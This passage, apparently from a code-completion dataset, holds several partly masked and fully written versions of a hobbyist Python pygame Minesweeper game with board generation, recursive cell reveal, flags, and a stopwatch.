CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n <mask token>\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return 
board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == 
MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def 
draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n 
self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = 
self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n 
self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win = False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def 
get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, 
(left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n", "step-4": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\nCELL_SIDE_LENGTH = 40\nCELL_MARGIN = 2\nGRID_HEIGHT = 10\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50\nY_BOARD_MARGIN = 75\nMENU_MARGIN 
= 100\nDIFFICULTY = 0.1\nFPS = 30\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY)\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT + CELL_MARGIN * GRID_HEIGHT +\n Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH + CELL_MARGIN * GRID_WIDTH + \n X_BOARD_MARGIN * 2 + MENU_MARGIN)\nRED = 255, 0, 0\nYELLOW = 255, 255, 0\nGREEN = 0, 255, 0\nMIDGREEN = 40, 190, 40\nCYAN = 0, 255, 255\nBLUE = 0, 0, 255\nDARKBLUE = 20, 20, 60\nMAGENTA = 255, 0, 255\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nGRAY = 200, 200, 200\nBG_COLOR = DARKBLUE\nCELL_COLOR = GRAY\nHIGHLIGHT_COLOR = CYAN\nFLAG_COLOR = MIDGREEN\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 'clear'\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == 
pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and 
right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win = False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return 
clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n 
pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - CELL_MARGIN / 2,\n top - CELL_MARGIN / 2, CELL_SIDE_LENGTH + CELL_MARGIN, \n CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n 
self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n", "step-5": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\n\n# TODO high scores, difficulties\n\n# Absolutes (in pixels where not otherwise stated)\nCELL_SIDE_LENGTH = 40 # Side length of each cell\nCELL_MARGIN = 2 # Gap between cells\nGRID_HEIGHT = 10 # How many cells are in the grid\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50 # Gap between grid and sides of board\nY_BOARD_MARGIN = 75\nMENU_MARGIN = 100 # Amount of space on the right dedicated to the menu\nDIFFICULTY = 0.1 # Ratio of bombs (10% by default)\nFPS = 30 # frames per second (window refresh speed)\n\n# Relatives (so board size can easily be changed)\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY) # Default about 10% of the board is mines\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * 